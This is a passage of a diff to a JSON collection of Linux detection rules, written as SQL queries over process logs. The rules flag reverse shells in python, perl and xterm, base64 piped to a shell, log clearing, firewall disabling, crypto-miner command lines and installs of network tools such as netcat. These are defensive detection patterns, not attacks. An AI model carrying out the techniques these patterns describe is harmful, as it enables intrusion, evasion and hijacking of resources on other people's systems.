"id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", + "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", + "author": "TuanLe (GTSC)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/usermod' ESCAPE '\\' AND (CommandLine LIKE '%-aG root%' ESCAPE '\\' OR CommandLine LIKE 
'%-aG sudoers%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_python_pty_spawn.yml" + "filename": "proc_creation_lnx_usermod_susp_group.yml" }, { - "title": "Scheduled Task/Job At", - "id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", - "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "title": "File Deletion", + "id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "author": "Ömer Günal, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/at' ESCAPE '\\' OR Image LIKE '%/atd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_at_command.yml" + "filename": "proc_creation_lnx_file_deletion.yml" }, { - "title": "Scheduled Cron Task/Job - Linux", - "id": "6b14bac8-3e3a-4324-8109-42f0546a347f", - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", + "title": "Linux Remote System Discovery", + "id": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "description": "Detects the enumeration of other remote systems.", "author": "Alejandro Ortuno, oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/arp' ESCAPE '\\' AND CommandLine LIKE '%-a%' ESCAPE '\\') OR (Image LIKE '%/ping' ESCAPE '\\' AND (CommandLine LIKE '% 10.%' ESCAPE '\\' OR CommandLine LIKE '% 192.168.%' ESCAPE '\\' OR CommandLine LIKE '% 172.16.%' ESCAPE '\\' OR CommandLine LIKE '% 172.17.%' ESCAPE '\\' OR CommandLine LIKE '% 172.18.%' ESCAPE '\\' OR CommandLine LIKE '% 172.19.%' ESCAPE '\\' OR CommandLine LIKE '% 172.20.%' ESCAPE '\\' OR CommandLine LIKE '% 172.21.%' ESCAPE '\\' OR CommandLine LIKE '% 172.22.%' ESCAPE '\\' OR CommandLine LIKE '% 172.23.%' ESCAPE '\\' OR CommandLine LIKE '% 172.24.%' ESCAPE '\\' OR CommandLine LIKE '% 172.25.%' ESCAPE '\\' OR CommandLine LIKE '% 172.26.%' ESCAPE '\\' OR CommandLine LIKE '% 172.27.%' ESCAPE '\\' OR CommandLine LIKE '% 172.28.%' ESCAPE '\\' OR CommandLine LIKE '% 172.29.%' ESCAPE '\\' OR CommandLine LIKE '% 172.30.%' ESCAPE '\\' OR CommandLine LIKE '% 172.31.%' ESCAPE '\\' OR CommandLine LIKE '% 127.%' ESCAPE '\\' OR CommandLine LIKE '% 169.254.%' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_schedule_task_job_cron.yml" + "filename": "proc_creation_lnx_remote_system_discovery.yml" }, { - "title": "Linux Base64 Encoded Pipe to Shell", - "id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", - "description": "Detects suspicious process command line that uses base64 encoded 
input for execution with a shell", - "author": "pH-T (Nextron Systems)", + "title": "Decode Base64 Encoded Text", + "id": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1027" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%base64 -w0 %' ESCAPE '\\' AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/base64' ESCAPE '\\' AND CommandLine LIKE '%-d%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_base64_execution.yml" + "filename": "proc_creation_lnx_base64_decode.yml" }, { - "title": "Disable Or Stop Services", - "id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", - "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Xterm Reverse Shell", + "id": "4e25af4b-246d-44ea-8563-e42aacab006b", + "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", + "author": "@d4ns4n_", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' OR Image LIKE '%/systemctl' ESCAPE '\\' OR Image LIKE '%/chkconfig' ESCAPE '\\') AND (CommandLine LIKE '%stop%' ESCAPE '\\' OR 
CommandLine LIKE '%disable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%xterm%' ESCAPE '\\' AND CommandLine LIKE '%-display%' ESCAPE '\\' AND CommandLine LIKE '%:1' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_services_stop_and_disable.yml" + "filename": "proc_creation_lnx_xterm_reverse_shell.yml" }, { - "title": "Sudo Privilege Escalation CVE-2019-14287", - "id": "f74107df-b6c6-4e80-bf00-4170b658162b", - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Package Installed - Linux", + "id": "700fb7e8-2981-401c-8430-be58e189e741", + "description": "Detects installation of suspicious packages using system installation utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CommandLine LIKE '% -u#%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%install%' ESCAPE '\\') OR (Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%localinstall%' ESCAPE '\\' OR CommandLine LIKE '%install%' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--install%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\'))) AND (CommandLine LIKE '%nmap%' ESCAPE '\\' OR CommandLine LIKE '% nc%' ESCAPE '\\' OR CommandLine LIKE '%netcat%' ESCAPE '\\' OR CommandLine LIKE '%wireshark%' ESCAPE '\\' OR CommandLine LIKE '%tshark%' ESCAPE '\\' OR CommandLine LIKE '%openconnect%' ESCAPE '\\' OR CommandLine LIKE '%proxychains%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_lnx_sudo_cve_2019_14287.yml" + "filename": "proc_creation_lnx_install_suspicioua_packages.yml" }, { - "title": "Remove Scheduled Cron Task/Job", - "id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", - "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Cat Sudoers", + "id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.reconnaissance", + "attack.t1592.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '% /etc/sudoers%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_crontab_removal.yml" + "filename": "proc_creation_lnx_cat_sudoers.yml" }, { - "title": "Flush Iptables Ufw Chain", - "id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", - "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "Curl Usage on Linux", + "id": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Network administrators" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/xtables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/iptables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/ip6tables' ESCAPE '\\' OR Image LIKE '%/ip6tables-legacy-multi' ESCAPE '\\') AND (CommandLine LIKE '%-F%' ESCAPE '\\' OR CommandLine LIKE '%-Z%' ESCAPE '\\' OR CommandLine LIKE '%-X%' ESCAPE '\\') AND (CommandLine LIKE '%ufw-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw-logging-allow%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-allow%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Image LIKE '%/curl' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_iptables_flush_ufw.yml" + "filename": "proc_creation_lnx_curl_usage.yml" }, { - "title": "Apt GTFOBin Abuse - Linux", - "id": "bb382fd5-b454-47ea-a264-1828e4c766d6", - "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Network Connections Discovery - Linux", + "id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "description": "Detects usage of system utilities to discover system network connections", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1049" ], "falsepositives": [ - "Unknown" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%APT::Update::Pre-Invoke::=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/who' ESCAPE '\\' OR Image LIKE '%/w' 
ESCAPE '\\' OR Image LIKE '%/last' ESCAPE '\\' OR Image LIKE '%/lsof' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE '%/usr/bin/landscape-sysinfo%' ESCAPE '\\' AND Image LIKE '%/who' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_gtfobin_apt.yml" + "filename": "proc_creation_lnx_system_network_connections_discovery.yml" }, { - "title": "Chmod Suspicious Directory", - "id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", - "description": "Detects chmod targeting files in abnormal directory paths.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "Remove Scheduled Cron Task/Job", + "id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.defense_evasion" ], "falsepositives": [ - "Admin changing file permissions." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/chmod' ESCAPE '\\' AND (CommandLine LIKE '%/tmp/%' ESCAPE '\\' OR CommandLine LIKE '%/.Library/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%' ESCAPE '\\' OR CommandLine LIKE '%/opt/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_susp_chmod_directories.yml" + "filename": "proc_creation_lnx_crontab_removal.yml" }, { - "title": "Local Groups Discovery - Linux", - "id": "676381a6-15ca-4d73-a9c8-6a22e970b90d", - "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "title": "Clear Linux Logs", + "id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1070.002" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/groups' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '%/etc/group%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\') AND (CommandLine LIKE '%/var/log%' ESCAPE '\\' OR CommandLine LIKE '%/var/spool/mail%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_local_groups.yml" + "filename": "proc_creation_lnx_clear_logs.yml" }, { "title": "Linux Network Service Scanning", 
@@ -1514,63 +1589,45 @@ "filename": "proc_creation_lnx_network_service_scanning.yml" }, { - "title": "Setuid and Setgid", - "id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", - "description": "Detects suspicious change of file privileges with chown and chmod commands", - "author": "Ömer Günal", + "title": "Capabilities Discovery - Linux", + "id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", + "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1548.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%chown root%' ESCAPE '\\' AND (CommandLine LIKE '% chmod u+s%' ESCAPE '\\' OR CommandLine LIKE '% chmod g+s%' ESCAPE '\\'))" - ], - "filename": "proc_creation_lnx_setgid_setuid.yml" - }, - { - "title": "User Has Been Deleted Via Userdel", - "id": "08f26069-6f80-474b-8d1f-d971c6fedea0", - "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. 
This is sometimes abused by threat actors in order to cover their tracks", - "author": "Tuan Le (NCSGroup)", - "tags": [ - "attack.impact", - "attack.t1531" - ], - "falsepositives": [ - "Legitimate administrator activities" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/userdel' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%/getcap' ESCAPE '\\' AND (CommandLine LIKE '% /r %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_userdel.yml" + "filename": "proc_creation_lnx_capa_discovery.yml" }, { - "title": "BPFtrace Unsafe Option Usage", - "id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", - "description": "Detects the usage of the unsafe bpftrace option", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Ufw Force Stop Using Ufw-Init", + "id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", + "description": "Detects attempts to force stop the ufw using ufw-init", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the unsafe option" + "Network administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%bpftrace' ESCAPE '\\' AND CommandLine LIKE '%--unsafe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((CommandLine LIKE '%-ufw-init%' ESCAPE '\\' AND CommandLine LIKE '%force-stop%' ESCAPE '\\') OR (CommandLine LIKE '%ufw%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + "filename": "proc_creation_lnx_disable_ufw.yml" }, { - "title": "Vim GTFOBin Abuse - Linux", - "id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", - "description": "Detects usage of \"vim\" and it's siblings as a GTFOBin to execute and proxy command and binary execution", + "title": "Potential Discovery Activity Using Find - Linux", + "id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", 
+ "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", 
@@ -1579,468 +1636,465 @@ "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/rvim' ESCAPE '\\' OR Image LIKE '%/vimdiff' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% --cmd%' ESCAPE '\\') AND (CommandLine LIKE '%:!/%' ESCAPE '\\' OR CommandLine LIKE '%:py %' ESCAPE '\\' OR CommandLine LIKE '%:lua %' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND (CommandLine LIKE '%-perm -4000%' ESCAPE '\\' OR CommandLine LIKE '%-perm -2000%' ESCAPE '\\' OR CommandLine LIKE '%-perm 0777%' ESCAPE '\\' OR CommandLine LIKE '%-perm -222%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o w%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o x%' ESCAPE '\\' OR CommandLine LIKE '%-perm -u=s%' ESCAPE '\\' OR CommandLine LIKE '%-perm -g=s%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_gtfobin_vim.yml" + "filename": "proc_creation_lnx_susp_find_execution.yml" }, { - "title": "Connection Proxy", - "id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", - "description": "Detects setting proxy configuration", - "author": "Ömer Günal", + "title": "Linux Doas Tool Execution", + "id": "067d8238-7127-451c-a9ec-fa78045b618b", + "description": "Detects the doas tool execution in linux host platform. 
This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "author": "Sittikorn S, Teoderick Contreras", "tags": [ - "attack.defense_evasion", - "attack.t1090" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate administration activities" + "Unlikely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%http\\_proxy=%' ESCAPE '\\' OR CommandLine LIKE '%https\\_proxy=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/doas' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_proxy_connection.yml" + "filename": "proc_creation_lnx_doas_execution.yml" }, { - "title": "Group Has Been Deleted Via Groupdel", - "id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", - "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", - "author": "Tuan Le (NCSGroup)", + "title": "Potential Perl Reverse Shell Execution", + "id": "259df6bc-003f-4306-9f54-4ff1a08fa38e", + "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.execution" ], "falsepositives": [ - "Legitimate administrator activities" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/groupdel' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/perl' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\') AND ((CommandLine LIKE '%fdopen(%' ESCAPE '\\' AND CommandLine LIKE '%::Socket::INET%' ESCAPE '\\') OR (CommandLine LIKE '%Socket%' ESCAPE '\\' AND CommandLine LIKE '%connect%' ESCAPE '\\' AND CommandLine LIKE '%open%' ESCAPE '\\' AND CommandLine LIKE '%exec%' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_groupdel.yml" + "filename": 
"proc_creation_lnx_perl_reverse_shell.yml" }, { - "title": "DD File Overwrite", - "id": "2953194b-e33c-4859-b9e8-05948c167447", - "description": "Detects potential overwriting and deletion of a file using DD.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "tags": [ - "attack.impact", - "attack.t1485" - ], + "title": "Linux Crypto Mining Indicators", + "id": "9069ea3c-b213-4c52-be13-86506a227ab1", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Any user deleting files that way." + "Legitimate use of crypto miners" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image IN ('/bin/dd', '/usr/bin/dd') AND CommandLine LIKE '%of=%' ESCAPE '\\' AND (CommandLine LIKE '%if=/dev/zero%' ESCAPE '\\' OR CommandLine LIKE '%if=/dev/null%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%sh -c /sbin/modprobe msr allow\\_writes=on%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_dd_file_overwrite.yml" + "filename": "proc_creation_lnx_crypto_mining.yml" 
}, { - "title": "Linux HackTool Execution", - "id": "a015e032-146d-4717-8944-7a1884122111", - "description": "Detects known hacktool execution based on image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Python Reverse Shell", + "id": "32e62bc7-3de0-4bb1-90af-532978fe42c0", + "description": "Detects executing python with keywords related to network activity that could indicate a potential reverse shell", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/sqlmap' ESCAPE '\\' OR Image LIKE '%/teamserver' ESCAPE '\\' OR Image LIKE '%/aircrack-ng' ESCAPE '\\' OR Image LIKE '%/john' ESCAPE '\\' OR Image LIKE '%/setoolkit' ESCAPE '\\' OR Image LIKE '%/wpscan' ESCAPE '\\' OR Image LIKE '%/hydra' ESCAPE '\\' OR Image LIKE '%/nikto' ESCAPE '\\' OR Image LIKE '%/ebpfkit' ESCAPE '\\' OR Image LIKE '%/bpfdos' ESCAPE '\\' OR Image LIKE '%/exechijack' ESCAPE '\\' OR Image LIKE '%/pidhide' ESCAPE '\\' OR Image LIKE '%/writeblocker' ESCAPE '\\') OR Image LIKE '%/linpeas%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%python%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%import%' ESCAPE '\\' AND CommandLine LIKE '%pty%' ESCAPE '\\' AND CommandLine LIKE '%spawn(%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_hack_tools.yml" + "filename": "proc_creation_lnx_python_reverse_shell.yml" }, { - "title": "Clear Linux Logs", - "id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", - "description": "Detects attempts to clear logs on the system. 
Adversaries may clear system logs to hide evidence of an intrusion", - "author": "Ömer Günal, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], + "title": "Nohup Execution", + "id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "falsepositives": [ - "Legitimate administration activities" + "Administrators or installed processes that leverage nohup" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\') AND (CommandLine LIKE '%/var/log%' ESCAPE '\\' OR CommandLine LIKE '%/var/spool/mail%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Image LIKE '%/nohup' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_clear_logs.yml" + "filename": "proc_creation_lnx_nohup.yml" }, { - "title": "Install Root Certificate", - "id": "78a80655-a51e-4669-bc6b-e9d206a462ee", - "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", - "author": "Ömer Günal, oscd.community", + "title": "History File Deletion", + "id": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "description": "Detects events in which a history file gets deleted, e.g. 
